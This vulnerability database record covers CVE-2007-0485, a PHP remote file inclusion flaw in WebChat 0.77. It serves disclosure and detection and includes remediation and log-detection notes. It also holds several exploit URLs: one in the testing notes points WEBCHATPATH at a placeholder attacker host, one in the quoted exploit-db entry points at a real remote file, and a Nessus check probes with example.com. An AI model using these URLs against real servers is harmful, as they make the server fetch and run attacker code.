ID OSVDB:36689
Type osvdb
Reporter OSVDB
Modified 2007-01-21T00:00:00
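Description
WebChat 0.77 contains a PHP remote file inclusion flaw in defines.php (CVE-2007-0485): the WEBCHATPATH request parameter is used as the prefix of an include path, so a URL supplied there is fetched and run as PHP with the permissions of the web server user.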
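Manual Testing Notes
http://[victim]/[webchat-077_path]/defines.php?WEBCHATPATH=http://[attacker]/[code]?
In web server access logs, a request to defines.php whose WEBCHATPATH value is a URL matches this pattern and should be treated as a probe or an exploitation attempt. The scanner entry for this issue gives the remediation as contacting the vendor for a patch or removing the application. Turning off PHP's `allow_url_include` (and `allow_url_fopen`) blocks the remote-URL form of the inclusion, but not the local-file read that the scanner description also mentions.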
References:
ISS X-Force ID: 31624
Generic Exploit URL: http://milw0rm.com/exploits/3169
CVE-2007-0485
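Bugtraq ID: 22153 (the Nessus plugin in the record below, first published 2003-03-03, cites Bugtraq ID 7000 for the same WEBCHATPATH inclusion, so the flaw appears to have been reported before the 2007 advisory)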
{"bulletinFamily": "software", "viewCount": 13, "reporter": "OSVDB", "references": [], "description": "## Manual Testing Notes\nHttp://[victim/[webchat-077_path]/defines.php?WEBCHATPATH=http://[attacker]/[code]?\n## References:\nISS X-Force ID: 31624\nGeneric Exploit URL: http://milw0rm.com/exploits/3169\n[CVE-2007-0485](https://vulners.com/cve/CVE-2007-0485)\nBugtraq ID: 22153\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:36689", "modified": "2007-01-21T00:00:00", "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2017-04-28T13:20:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0485"]}, {"type": "nessus", "idList": ["WEBCHAT_CODE_INJECTION.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:3169"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7088"]}], "modified": "2017-04-28T13:20:32", "rev": 2}, "vulnersScore": 7.3}, "id": "OSVDB:36689", "title": "WebChat defines.php WEBCHATPATH Variable Remote File Inclusion", "edition": 1, "published": "2007-01-21T00:00:00", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-0485"], "lastseen": "2017-04-28T13:20:32"}
{"cve": [{"lastseen": "2021-02-02T05:31:20", "description": "PHP remote file inclusion vulnerability in defines.php in WebChat 0.77 allows remote attackers to execute arbitrary PHP code via a URL in the WEBCHATPATH parameter.", "edition": 4, "cvss3": {}, "published": "2007-01-25T00:28:00", "title": "CVE-2007-0485", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0485"], "modified": "2018-10-16T16:32:00", "cpe": ["cpe:/a:webchat.org:webchat:0.77"], "id": "CVE-2007-0485", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webchat.org:webchat:0.77:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T17:53:13", "description": "WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln. CVE-2007-0485. 
Webapps exploit for php platform", "published": "2007-01-21T00:00:00", "type": "exploitdb", "title": "WebChat 0.77 defines.php WEBCHATPATH Remote File Include Vuln", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-0485"], "modified": "2007-01-21T00:00:00", "id": "EDB-ID:3169", "href": "https://www.exploit-db.com/exploits/3169/", "sourceData": "######################################################################### \n# \n# [ webchat ] \n# \n# Class: File Include Vulnerability \n# Published 2007/1/21 \n# Remote: Yes \n# Critical Level : Dangerous \n# Site: http://www.easy-script.com/compt.php?id=1705 || http://sourceforge.net/projects/webdev-webchat/\n# Author: TheViper-hacker \n# Contact: theviper-hacker@hotmail.com \n# \n#########################################################################\nfile ;\nframe.php\n======================================================\nVuln Code\ninclude ($WEBCHATPATH.'language/english.php');\n=======================================================\nExploit : \nHttp:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?\n \n ---- Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA] ]organza[\n ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com\n--------------------------------------|| Viva ISLAM ||-----------------------------------------\n\n# milw0rm.com [2007-01-21]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3169/"}], "nessus": [{"lastseen": "2021-01-20T15:48:28", "description": "The version of Webchat installed on the remote host allows an attacker\nto read local files or execute PHP code, possibly taken from third-\nparty sites, subject to the permissions of the web server user id.", "edition": 24, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2003-03-03T00:00:00", "title": "WebChat defines.php WEBCHATPATH Parameter 
Remote File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0485"], "modified": "2003-03-03T00:00:00", "cpe": [], "id": "WEBCHAT_CODE_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/11315", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# Ref:\n#\n# From: \"Frog Man\" <leseulfrog@hotmail.com>\n# To: bugtraq@securityfocus.com\n# Cc: vulnwatch@vulnwatch.org\n# Date: Mon, 03 Mar 2003 13:57:43 +0100\n# Message-ID: <F33JEyTeTaj1qNIFR2e000195ec@hotmail.com>\n# Subject: [VulnWatch] WebChat (PHP)\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(11315);\n script_version(\"1.25\");\n script_cve_id(\"CVE-2007-0485\");\n script_bugtraq_id(7000);\n\n script_name(english:\"WebChat defines.php WEBCHATPATH Parameter Remote File Inclusion\");\n script_summary(english:\"Checks for the presence of Webchat's defines.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by a\nremote code inclusion flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Webchat installed on the remote host allows an attacker\nto read local files or execute PHP code, possibly taken from third-\nparty sites, subject to the permissions of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/313606\" );\n script_set_attribute(attribute:\"solution\", value:\"Contact the vendor for a patch or remove the application.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2007-0485\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/03/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/01/21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CGI abuses\");\n\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\n\n\nfunction check(loc)\n{\n local_var r, w;\n\n w = http_send_recv3(method:\"GET\", port: port, item:string(loc, \"/defines.php?WEBCHATPATH=http://example.com/\"));\n if (isnull(w)) exit(0);\n r = w[2];\n if(\"http://example.com/db_mysql.php\" >< r )\n {\n \tsecurity_hole(port);\n\texit(0);\n }\n}\n\n\nforeach dir (dirs)\n{\n check(loc:dir);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-0549", "CVE-2007-0542", "CVE-2007-0485", "CVE-2007-0499", "CVE-2007-0502", "CVE-2007-0550", "CVE-2007-0501", "CVE-2007-0492"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2007-01-22T00:00:00", "published": 
"2007-01-22T00:00:00", "id": "SECURITYVULNS:VULN:7088", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7088", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}